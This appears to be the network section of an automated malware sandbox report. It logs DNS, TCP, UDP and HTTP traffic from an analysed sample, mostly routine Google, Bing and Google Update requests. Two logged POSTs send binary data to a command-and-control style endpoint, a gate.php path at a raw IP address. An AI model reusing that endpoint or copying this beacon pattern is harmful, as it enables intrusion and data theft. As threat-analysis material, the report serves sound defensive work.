Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
r3---sn-3u-bh26.gvt1.com |
CNAME
r3.sn-3u-bh26.gvt1.com
|
59.18.44.14 |
www.google.com | 172.217.25.100 |
- TCP Requests
-
-
192.168.56.102:49808 13.107.21.200:443
-
192.168.56.102:49806 142.250.199.68:443www.google.com
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49814 172.217.25.3:443
-
192.168.56.102:49813 203.159.80.141:80
-
192.168.56.102:49817 203.159.80.141:80
-
192.168.56.102:49815 216.58.200.14:80
-
192.168.56.102:49816 59.18.44.14:80r3---sn-3u-bh26.gvt1.com
-
- UDP Requests
-
-
192.168.56.102:50839 164.124.101.2:53
-
192.168.56.102:54660 164.124.101.2:53
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:61998 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:61460 239.255.255.250:3702
-
GET
200
https://www.google.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 01 Apr 2021 00:30:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2021-04-01-00; expires=Sat, 01-May-2021 00:30:50 GMT; path=/; domain=.google.com; Secure
Set-Cookie: NID=212=OEQC1LCfN9wEavngYMdW3jT1SfMfMq_QEEd1V9q_Z-Pm2xTy_2pHbPJRUJntZiPrm2sWKY4P_N7qnIWgCSGGnazYYQgn3cDYtD1d8A07ZM82WUWAkIpTvwu12Kyyyd1-eNfkFZd5FG41lem9YY6uPRTeuDjE8Somh6mtxYE5ZCo; expires=Fri, 01-Oct-2021 00:30:50 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET
200
https://www.bing.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Host: www.bing.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Set-Cookie: MUID=3E86F2913265692F1977E29D33F66810; domain=.bing.com; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=3E86F2913265692F1977E29D33F66810; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/
Set-Cookie: _EDGE_S=F=1&SID=176897864A2C669138DB878A4BBF670D; domain=.bing.com; path=/
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Set-Cookie: SRCHUID=V=2&GUID=1E6BEE4E47E1441DAF1324C8BF0439A4&dmnchg=1; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Set-Cookie: SRCHUSR=DOB=20210401; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Set-Cookie: SRCHHPGUSR=SRCHLANGV2=ko; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Set-Cookie: _SS=SID=176897864A2C669138DB878A4BBF670D; domain=.bing.com; path=/
Set-Cookie: ULC=; domain=.bing.com; expires=Wed, 31-Mar-2021 00:30:50 GMT; path=/
Set-Cookie: _HPVN=CS=eyJQbiI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiUCJ9LCJTYyI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiSCJ9LCJReiI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiVCJ9LCJBcCI6dHJ1ZSwiTXV0ZSI6dHJ1ZSwiTGFkIjoiMjAyMS0wNC0wMVQwMDowMDowMFoiLCJJb3RkIjowLCJEZnQiOm51bGwsIk12cyI6MCwiRmx0IjowLCJJbXAiOjF9; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-MSEdge-Ref: Ref A: D976900F8F464C9CB9C4090E7F36C5AE Ref B: SLAEDGE1020 Ref C: 2021-04-01T00:30:50Z
Date: Thu, 01 Apr 2021 00:30:50 GMT
POST
200
https://update.googleapis.com/service/update2?cup2key=10:1403012316&cup2hreq=66305915241c4634f51031e5bc7c5d4bdf4e8c4f63e65e37b4ec8569d469c62c
REQUEST
RESPONSE
BODY
POST /service/update2?cup2key=10:1403012316&cup2hreq=66305915241c4634f51031e5bc7c5d4bdf4e8c4f63e65e37b4ec8569d469c62c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.32;winhttp;cup-ecdsa
X-Old-UID: cnt=0
X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96}
X-Goog-Update-Updater: Omaha-1.3.36.32
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1202
Host: update.googleapis.com
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-zu1/DT65NdLvgIX4NwTlnQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 01 Apr 2021 00:32:17 GMT
X-Cup-Server-Proof: 30460221008b7d740d314a86645ad2dd50c666e93accbea8034e925630bb99c5140184dce9022100cc1dc480376a6e5a0cbf6a7ae9382a3becfda1a2e4b9a25e1db4a1416406551c:66305915241c4634f51031e5bc7c5d4bdf4e8c4f63e65e37b4ec8569d469c62c
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5203
X-Daystart: 63137
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST
0
http://203.159.80.141/LKJHGDS/gate.php
REQUEST
RESPONSE
BODY
POST /LKJHGDS/gate.php HTTP/1.0
Host: 203.159.80.141
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 3712
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
HEAD
302
http://redirector.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
HTTP/1.1 302 Found
Date: Thu, 01 Apr 2021 00:32:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Location: http://r3---sn-3u-bh26.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes
Content-Type: text/html; charset=UTF-8
Server: ClientMapServer
Content-Length: 481
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
HEAD
200
http://r3---sn-3u-bh26.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes
REQUEST
RESPONSE
BODY
HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-3u-bh26.gvt1.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: public,max-age=86400
Content-Disposition: attachment
Content-Length: 1304160
Content-Security-Policy: default-src 'none'
Content-Type: application/octet-stream
Etag: "8346e1"
Server: downloads
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Date: Wed, 31 Mar 2021 04:59:43 GMT
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Last-Modified: Fri, 22 Jan 2021 06:31:14 GMT
Connection: keep-alive
Vary: Origin
POST
0
http://203.159.80.141/LKJHGDS/gate.php
REQUEST
RESPONSE
BODY
POST /LKJHGDS/gate.php HTTP/1.0
Host: 203.159.80.141
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 3712
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
GET
206
http://r3---sn-3u-bh26.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=0-6881
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-3u-bh26.gvt1.com
HTTP/1.1 206 Partial Content
Accept-Ranges: bytes
Cache-Control: public,max-age=86400
Content-Disposition: attachment
Content-Length: 6882
Content-Security-Policy: default-src 'none'
Content-Type: application/octet-stream
Etag: "8346e1"
Server: downloads
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Date: Wed, 31 Mar 2021 04:59:43 GMT
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Last-Modified: Fri, 22 Jan 2021 06:31:14 GMT
Content-Range: bytes 0-6881/1304160
Connection: keep-alive
Vary: Origin
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts